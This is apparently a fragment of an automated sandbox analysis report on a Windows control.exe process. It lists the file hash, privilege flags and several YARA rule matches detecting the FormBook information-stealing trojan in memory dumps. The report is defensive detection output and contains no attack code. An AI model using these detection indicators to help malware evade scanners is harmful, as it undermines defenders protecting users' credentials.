                                                                              Commandline:C:\Windows\SysWOW64\control.exe
                                                                              Imagebase:0x880000
                                                                              File size:114688 bytes
                                                                              MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              Reputation:high

                                                                              Disassembly

                                                                              No disassembly